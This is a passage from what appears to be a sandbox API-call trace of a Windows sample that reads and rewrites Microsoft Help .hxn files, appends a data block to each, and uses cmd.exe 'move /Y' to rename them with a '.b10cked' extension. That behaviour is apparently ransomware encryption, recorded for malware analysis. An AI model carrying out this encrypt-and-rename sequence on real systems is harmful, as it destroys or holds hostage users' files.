lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.686] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.687] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.687] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.688] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.688] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0197.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0197.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0197.692] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.692] CloseHandle (hObject=0x120) returned 1 [0197.802] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN") returned 0x27 [0197.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.803] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcfc, dwThreadId=0xcd8)) returned 1 [0197.807] CloseHandle (hObject=0x1b4) returned 1 [0197.808] CloseHandle (hObject=0x120) returned 1 [0197.808] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.808] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.808] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.808] ReleaseMutex (hMutex=0xf8) returned 1 [0197.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.808] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.808] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25459991789) returned 1 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.811] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x170 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.812] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x170 [0197.813] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.813] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.813] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.814] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0197.814] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xb7, lpOverlapped=0x0) returned 1 [0197.814] SetFilePointer (in: hFile=0x120, lDistanceToMove=-183, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb9 [0197.814] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xb7, lpOverlapped=0x0) returned 1 [0197.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0197.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSACCESS.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x132f75c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSACCESS.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0197.818] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x170 [0197.818] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.818] CloseHandle (hObject=0x120) returned 1 [0197.819] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN") returned 0x27 [0197.820] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.820] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd1c, dwThreadId=0xd28)) returned 1 [0197.824] CloseHandle (hObject=0x1b4) returned 1 [0197.824] CloseHandle (hObject=0x120) returned 1 [0197.824] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.824] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.824] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.825] ReleaseMutex (hMutex=0xf8) returned 1 [0197.825] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25461492885) returned 1 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.826] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.827] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.827] 